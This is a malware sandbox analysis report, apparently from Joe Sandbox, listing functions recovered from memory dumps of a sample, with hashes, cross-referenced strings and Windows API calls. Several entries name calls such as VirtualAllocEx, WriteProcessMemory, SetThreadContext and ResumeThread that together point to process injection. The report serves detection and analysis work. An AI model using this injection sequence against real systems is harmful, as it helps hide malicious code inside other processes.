Opcode Fuzzy Hash: 6c9358d0444e242b7c3993a3ec081ce9504ad690e85e29641d600ed19adda220
Instruction Fuzzy Hash: 8A51D6B1900259DBDB24CF59C840BDDBBB5BF48310F1484EAE919B7250DB75AA89CF90

Function 008A5FC0 Relevance: 24.0, Strings: 19, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 008A6087
Te^q, xrefs: 008A62AB
Te^q, xrefs: 008A60AD
Ycq, xrefs: 008A60BC
Zcq, xrefs: 008A605C
Zcq, xrefs: 008A606C
Te^q, xrefs: 008A6123
Zcq, xrefs: 008A602D
Zcq, xrefs: 008A632E
Zcq, xrefs: 008A601D
Te^q, xrefs: 008A61A5
Te^q, xrefs: 008A628C
Te^q, xrefs: 008A6180
Zcq, xrefs: 008A62FD
Te^q, xrefs: 008A610C
Te^q, xrefs: 008A60D5
Zcq, xrefs: 008A630D
Zcq, xrefs: 008A5FFA
Te^q, xrefs: 008A61B5

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Ycq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq$Zcq
API String ID: 0-14551937
Opcode ID: 9924c215f9d8682f3fa148ffddfeea1784465308645a6b36807ee8793415155a
Instruction ID: 6cf561d31d890ee8d9f48f4b3e84835b1cf7a67faa5194a824704e0e95662d09
Opcode Fuzzy Hash: 9924c215f9d8682f3fa148ffddfeea1784465308645a6b36807ee8793415155a
Instruction Fuzzy Hash: 4D917974B00108DFDB048F69D4587BE7BF2FB89315F280826D402EB798EB358C959B51

Function 008A5FBC Relevance: 19.0, Strings: 15, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 008A6087
Te^q, xrefs: 008A62AB
Te^q, xrefs: 008A60AD
Ycq, xrefs: 008A60BC
Zcq, xrefs: 008A605C
Te^q, xrefs: 008A6123
Zcq, xrefs: 008A632E
Zcq, xrefs: 008A601D
Te^q, xrefs: 008A61A5
Te^q, xrefs: 008A628C
Te^q, xrefs: 008A6180
Zcq, xrefs: 008A62FD
Te^q, xrefs: 008A610C
Te^q, xrefs: 008A60D5
Zcq, xrefs: 008A5FFA

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Ycq$Zcq$Zcq$Zcq$Zcq$Zcq
API String ID: 0-1428580193
Opcode ID: 976b5fb5a901eccefb2857ca2dfae303a5ffe5ca304058d36ae7343ab5519af4
Instruction ID: 61327e3c7b31a80b31c6172e23a29a0a3b2bee4223b55041973bd74f7ae517bf
Opcode Fuzzy Hash: 976b5fb5a901eccefb2857ca2dfae303a5ffe5ca304058d36ae7343ab5519af4
Instruction Fuzzy Hash: 9E718874B04108CFEB048F69D4587AE7BF2FB8A315F280526D402EBB98EB758C95DB51

Function 008AA261 Relevance: 10.5, Strings: 8, Instructions: 459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 008AA29E
,bq, xrefs: 008AA710
(o^q, xrefs: 008AA422
,bq, xrefs: 008AA700
(o^q, xrefs: 008AA385
(o^q, xrefs: 008AA359
(o^q, xrefs: 008AA77F
(o^q, xrefs: 008AA76F

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 451438394e8942574aa27bf36201357d98f095397f77c3ea4d8605059eb317bb
Instruction ID: f2ee025b7dce3a02ac07cb804aa32f8af1797fd566a6f742772289aa0ed2b0cb
Opcode Fuzzy Hash: 451438394e8942574aa27bf36201357d98f095397f77c3ea4d8605059eb317bb
Instruction Fuzzy Hash: A0125C70A002188FDB28CF69C884AAEBBF2FF59315F148559E45ADBA61DB30ED41CF51

Function 008A4F41 Relevance: 3.9, Strings: 3, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(5Y, xrefs: 008A4ECE
M5Y, xrefs: 008A4F80
,I[, xrefs: 008A4EA9

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (5Y$,I[$M5Y
API String ID: 0-461501782
Opcode ID: 16738cff835dea8b7178058ea8a338945126e1bedadddb54debff521bcc36e09
Instruction ID: 6de19a8ed877fc85a6fdcd0ca2ed431da460351036398e5faf374a4b061bf1a6
Opcode Fuzzy Hash: 16738cff835dea8b7178058ea8a338945126e1bedadddb54debff521bcc36e09
Instruction Fuzzy Hash: 0B419CB29002099FCF11DBA8D849AEEBBB6FF8A301F105169D006FB661DF3059058B65

Function 008A4C70 Relevance: 3.9, Strings: 3, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 008A4DBD
$^q, xrefs: 008A4DC9
F[, xrefs: 008A4D07

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: $^q$$^q$F[
API String ID: 0-3390602067
Opcode ID: 6ff7fc80bcd3ceee9a71daa86df591c6f4d9b6b2ca9326fef4483b5bf63e242f
Instruction ID: a22e17859e34993c3c920195e087fb41d4e1b72c00d8378e98a86248492fb166
Opcode Fuzzy Hash: 6ff7fc80bcd3ceee9a71daa86df591c6f4d9b6b2ca9326fef4483b5bf63e242f
Instruction Fuzzy Hash: 0F312670B052288FEF159F69845462A3BE6FBC6714B24887ED209CF785DEB18C06C791

Function 008A4E7B Relevance: 3.8, Strings: 3, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(5Y, xrefs: 008A4ECE
M5Y, xrefs: 008A4F80
,I[, xrefs: 008A4EA9

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (5Y$,I[$M5Y
API String ID: 0-461501782
Opcode ID: 7697deae664e8ebc11dca2a9cbbbdf2be1474665639fcbf097c078afea4a434d
Instruction ID: 512d44e44fb4bcf3524e2747321059020efe406bbbca6634e1a54726c7202553
Opcode Fuzzy Hash: 7697deae664e8ebc11dca2a9cbbbdf2be1474665639fcbf097c078afea4a434d
Instruction Fuzzy Hash: AE3128B59001089FCF01DFA8E855ADEBBFAFF89301F10856AE406BB365DF3159058BA1

Function 008A4E80 Relevance: 3.8, Strings: 3, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(5Y, xrefs: 008A4ECE
M5Y, xrefs: 008A4F80
,I[, xrefs: 008A4EA9

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (5Y$,I[$M5Y
API String ID: 0-461501782
Opcode ID: 9ece7332f7d9da17a46a509ef049fe29ff679ae2ba3aa8bf1a222887a839a317
Instruction ID: dd689b41578f655906ff71aa01b20f5253f060098c6cf8d1fa8e809b77025eaf
Opcode Fuzzy Hash: 9ece7332f7d9da17a46a509ef049fe29ff679ae2ba3aa8bf1a222887a839a317
Instruction Fuzzy Hash: 39311BB59001089FCF41DFA8E855ADEBBFAFF89301F108469E106BB364DF3159458BA1

Function 008A8FF8 Relevance: 2.7, Strings: 2, Instructions: 233COMMON

Download Yara Rule

Strings

,bq, xrefs: 008A90D8
,bq, xrefs: 008A90CE

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: ebeefc4dd4d852a1d825a3c8bae277051b33f527630ea10a37427f5246ce2938
Instruction ID: 1f13b4f4203e362d5fc66d6a51cd08d9535d65db9a3143c8cadc121c96d2e0e4
Opcode Fuzzy Hash: ebeefc4dd4d852a1d825a3c8bae277051b33f527630ea10a37427f5246ce2938
Instruction Fuzzy Hash: A881F330B08506DFEB04DF69C888AAAB7F1FF8A315B258169D456DBB60DB31DC41CB90

Function 008A8A88 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

Hbq, xrefs: 008A8B83
Hbq, xrefs: 008A8BB6

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: bc51dee14a1cb42148c999feae2a8d1eaefb88d7d039cbe28351ccc8a5ffa8c7
Instruction ID: fab68027d7cecd6f3ed22f64c629bd216b27a803962a8a651a6856bed48cef37
Opcode Fuzzy Hash: bc51dee14a1cb42148c999feae2a8d1eaefb88d7d039cbe28351ccc8a5ffa8c7
Instruction Fuzzy Hash: 0261CC70704215DFEB118F24D888B6E7BE2FF8A314F158969E446CB291DB348C02CBB1

Function 008A4C08 Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

$^q, xrefs: 008A4DBD
F[, xrefs: 008A4D07

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: $^q$F[
API String ID: 0-3350560160
Opcode ID: c92a47ed0b537673f80c4a8a501d2c4fe8982a8acef8041d6a74e47c808b222e
Instruction ID: a824f01f1fab8d7fc9258efcfa7e7eac9e84612246d54f0b692a57fe01c8f23e
Opcode Fuzzy Hash: c92a47ed0b537673f80c4a8a501d2c4fe8982a8acef8041d6a74e47c808b222e
Instruction Fuzzy Hash: 78412635A0A2548FEB115BA494547A97BE1FBC7328F2884FFC158CF686CAB68C06C751

Function 073C09FF Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

TJcq, xrefs: 073C0AD6
Te^q, xrefs: 073C0AC1

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 42417f9e7670deccae2c83c49bce0a79156e8032f727a389b0c17f218f49a6b2
Instruction ID: beb418c1c480517cd9007fa4d2fc5031f9813712d169808afe3944a13faea1a6
Opcode Fuzzy Hash: 42417f9e7670deccae2c83c49bce0a79156e8032f727a389b0c17f218f49a6b2
Instruction Fuzzy Hash: F331D9707141118FC709BBBDE89952EBBF6EF89714F41489AE449DB351CE389C0AC792

Function 073C0A18 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

TJcq, xrefs: 073C0AD6
Te^q, xrefs: 073C0AC1

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 1cf8c77af8c287bdb3e3fa94ffbb43d2a84ace4d844c1fbc5fd008abfbda8263
Instruction ID: bfa3a9417777d162863bdb57317e3ca245c7809e243942831f7d08dee18aefbb
Opcode Fuzzy Hash: 1cf8c77af8c287bdb3e3fa94ffbb43d2a84ace4d844c1fbc5fd008abfbda8263
Instruction Fuzzy Hash: 6A21B1707101158BC708BBBDE899A2EB7EAEF88714F404869E449DB351DE34EC0A8796

Function 073CC9B8 Relevance: 1.8, Strings: 1, Instructions: 599COMMON

Download Yara Rule

Strings

#6, xrefs: 073CD116

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: #6
API String ID: 0-2502063716
Opcode ID: 66811567fb839941057750335e8c7b6da41714e012a46d128a8f46be25405374
Instruction ID: a489bb13618d27b74d76a7fb4d94330481544686d7161af2178844e7d0978680
Opcode Fuzzy Hash: 66811567fb839941057750335e8c7b6da41714e012a46d128a8f46be25405374
Instruction Fuzzy Hash: D3125870B042118FD705FBB9D89862EBBF6EF85604F45486AD089E7381DE38AD06C763

Function 073C0006 Relevance: 1.8, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

Te^q, xrefs: 073C05ED

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 0a8f0b838310ce5ce08dd0f25a92a73e21046509f19d2744797fc3c0777c03e3
Instruction ID: d6b0916affc2d830c85ee1892c5453f9c379c5d91be0314e92cbd0de0f5e726b
Opcode Fuzzy Hash: 0a8f0b838310ce5ce08dd0f25a92a73e21046509f19d2744797fc3c0777c03e3
Instruction Fuzzy Hash: AC229E70A10214CBD748BFB9D88976DBBF6BF88704F9084A9D089E7354DE34AD49CB52

Function 073C0040 Relevance: 1.8, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

Te^q, xrefs: 073C05ED

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 7c47840dc8580e701bde821c13fc07fb3f803739fdc5882fcea8b73dda6a44f2
Instruction ID: eb9052cbf2875e71ed49b827477aa69adf427344d550fd822a8e736bf31cd64f
Opcode Fuzzy Hash: 7c47840dc8580e701bde821c13fc07fb3f803739fdc5882fcea8b73dda6a44f2
Instruction Fuzzy Hash: 2C128F70B10214CBD748BFB9D98972DBBF5BB88704F9084A9D089E7354DE34AD49CB52

Function 008AABE8 Relevance: 1.7, Strings: 1, Instructions: 467COMMON

Download Yara Rule

Strings

(o^q, xrefs: 008AAC31

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 81371426bdb19322491c0f7709ac811c66b4bbab0ba7d0f767eeea061107f4cc
Instruction ID: 1f7de2bb350e2c95e395bf125188f3d5e4572e679caf88b44ec53abd355936fc
Opcode Fuzzy Hash: 81371426bdb19322491c0f7709ac811c66b4bbab0ba7d0f767eeea061107f4cc
Instruction Fuzzy Hash: 9A127034A00509DFDB15CF68C994AAEBBF2FF89305F158559E406DBAA2D730EC81CB91

Function 073CBA48 Relevance: 1.7, Strings: 1, Instructions: 442COMMON

Download Yara Rule

Strings

@, xrefs: 073CBEFC

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1fa8dd251d2a62423f496e43c7508167076a43f9bb4a6c0affb3c0718f8cb4f8
Instruction ID: 8fd52da4cd9c2323fe8ec489b999cfc178751adfe396d3522f7958b3eb0bd35d
Opcode Fuzzy Hash: 1fa8dd251d2a62423f496e43c7508167076a43f9bb4a6c0affb3c0718f8cb4f8
Instruction Fuzzy Hash: A9D1D470A14205CFD704FF79E49956DBBF5EF49204F4148A9E489EB3A1DE389C0ACB52

Function 07BF97BD Relevance: 1.6, APIs: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07BF98DB

Memory Dump Source

Source File: 00000009.00000002.2849356702.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7bf0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1a186015869a0474e8a65c503dd483618fb4560aa993341dd53ca785814c31eb
Instruction ID: d590020c5e28b6264d50a25f979ac94752bb6830b7d0c4c5fe1e64b9c751fa66
Opcode Fuzzy Hash: 1a186015869a0474e8a65c503dd483618fb4560aa993341dd53ca785814c31eb
Instruction Fuzzy Hash: D241A0779012599FC711DF99E444ADAFFF1EB88334F25841AD428AB380C378A586CBD1

Function 00B5C1C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00B5C258

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 35f3a0ac110570e0ef17620e3e7e65a21acb596a1de75385a20ff9fb49be4810
Instruction ID: fb4ff816871d8d1f038776353e8c0abe03bc406e4aed7f4af422155695feffe3
Opcode Fuzzy Hash: 35f3a0ac110570e0ef17620e3e7e65a21acb596a1de75385a20ff9fb49be4810
Instruction Fuzzy Hash: 782139B19003099FCB10DFAAC885BDEBFF5FF88310F10842AE919A7240D7799954DBA4

Function 00B5C948 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00B5C9C6

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eac51a27df815f05a84a454c241227c92726e197db7ee48512d69ebd5b4446c9
Instruction ID: 574f06ec80c5ac54312d5811caa73c310e44334a190a2546bcb49d27ad138987
Opcode Fuzzy Hash: eac51a27df815f05a84a454c241227c92726e197db7ee48512d69ebd5b4446c9
Instruction Fuzzy Hash: 7E2137B19003098FDB10DFAAC4857EEBFF5EB88320F10842AD459A7241CB78A944CBA5

Function 00B5B638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00B5B6B6

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1da53b383f0b88c6bee16776a8edcb8bba6e2ff36fa8857b3d9f1d87202e4715
Instruction ID: b2a2ec85ca3deaaf4656cc26c9e0f17ce9bae675cf3fb06b482fef6c1add4a95
Opcode Fuzzy Hash: 1da53b383f0b88c6bee16776a8edcb8bba6e2ff36fa8857b3d9f1d87202e4715
Instruction Fuzzy Hash: 4C2137B19003098FDB10DFAAC485BAEFBF4EF88324F10842AD519A7241CB789944CFA5

Function 00B5C6C0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00B5C737

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f72b492b7adc4299e633a8a46d66dc57fbbdc65a1933c2a33c119abba6cdabd0
Instruction ID: 963f3889f629fe0382b93697ff090a322ed6ca95a18cfa4cde7d115a9053b1d7
Opcode Fuzzy Hash: f72b492b7adc4299e633a8a46d66dc57fbbdc65a1933c2a33c119abba6cdabd0
Instruction Fuzzy Hash: 9F2118B19003499FDB10DFAAC445BEEFBF5EF88320F10842AD559A7240C7789955DFA1

Function 00B527D0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00B5284B

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 936b3626463e2974d845509e2e40f4dfa47f744ac7d6a4a7a61dfe97c632831e
Instruction ID: 9a1c6f9759d3d9c4a74bbe2e43539e132141b9bab78cbf3e4eb8dd76b4205a73
Opcode Fuzzy Hash: 936b3626463e2974d845509e2e40f4dfa47f744ac7d6a4a7a61dfe97c632831e
Instruction Fuzzy Hash: 682124B59002099FCB10DFAAC484BDEFBF4FB48320F108029E818A7350D378AA45CFA1

Function 05039660 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 050396D0

Memory Dump Source

Source File: 00000009.00000002.2834088224.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5030000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1abfcef7238e65d981e323342af4e2eb262a4b67abc9d376f47ace817a67fc88
Instruction ID: cc9637aafbb64cc85fe5269b6a16debc45951d072d91f86bfffaf13733d59409
Opcode Fuzzy Hash: 1abfcef7238e65d981e323342af4e2eb262a4b67abc9d376f47ace817a67fc88
Instruction Fuzzy Hash: 181133B1C0061A9BCB14DF9AD445A9EFBF4FB48320F11852AD819A7240D778A944CFA5

Function 00B527D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00B5284B

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f4a4fb59f321c376fb0fea78c83835879533e874a9a425375d038c5d9574d9ec
Instruction ID: 71ebded0256cb94086e2bd737de43cd64c50bb967b882353b6d5105ca62e940e
Opcode Fuzzy Hash: f4a4fb59f321c376fb0fea78c83835879533e874a9a425375d038c5d9574d9ec
Instruction Fuzzy Hash: C421D6B59002499FCB10DF9AC584BDEFBF4FB49320F108469E958A7251D378A544CFA1

Function 07BF9868 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07BF98DB

Memory Dump Source

Source File: 00000009.00000002.2849356702.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7bf0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b1bb8f31314993a6367bfc493006bc0539d5c77e4bec60856e670eaaf965b22d
Instruction ID: f700dfd69eecd7a194a0c1eacdef4cb2aa679ca0469ab99ed6f04025c7a9b6c5
Opcode Fuzzy Hash: b1bb8f31314993a6367bfc493006bc0539d5c77e4bec60856e670eaaf965b22d
Instruction Fuzzy Hash: DA21D3B59002499FDB10DF9AC884BDEFBF4FB48320F10842AE958A7251D778A644CFA1

Function 00B5BE50 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00B5BEBE

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8d6545e027640906ae6d232237f002024ccc924d7ae42841abadee397fbec9ae
Instruction ID: 3d460c369cce6ff44f8716d2a7647fad8cee3e9dd3bc69d909b06e54e240be59
Opcode Fuzzy Hash: 8d6545e027640906ae6d232237f002024ccc924d7ae42841abadee397fbec9ae
Instruction Fuzzy Hash: 891126719002499FCB10DFAAC845ADFBFF5EF88320F148819E519A7250C775A954CFA1

Function 00B5CBD0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00B5CC32

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fcb6d64e9ae531cdabba01bfcbe32b25a4b0a37101159f92b0dc762bc695e5b1
Instruction ID: 75d6f1fd8902774e3841fbbd23bd369f718e7d8e3ab210aec65a7d8413276805
Opcode Fuzzy Hash: fcb6d64e9ae531cdabba01bfcbe32b25a4b0a37101159f92b0dc762bc695e5b1
Instruction Fuzzy Hash: 571125B19003498FCB24DFAAC44579EFFF5EB88324F20845AD519A7240CB79A944CBA5

Function 00B54D68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 00B5D27D

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ab4b7e27d814fdb16aa5c6950988585407b15a5b321bbfe454219a00e7dabf6f
Instruction ID: 1a5a5e1e7a84bdac6d27dcb2857e9d841194d667da86ba333dc5e3a00d65f504
Opcode Fuzzy Hash: ab4b7e27d814fdb16aa5c6950988585407b15a5b321bbfe454219a00e7dabf6f
Instruction Fuzzy Hash: CD1106B5800349DFCB20DF9AD485BDEFBF8EB48310F108559E919A7200C375A984CFA1

Function 008AB1E8 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

4'^q, xrefs: 008AB273

Memory Dump Source

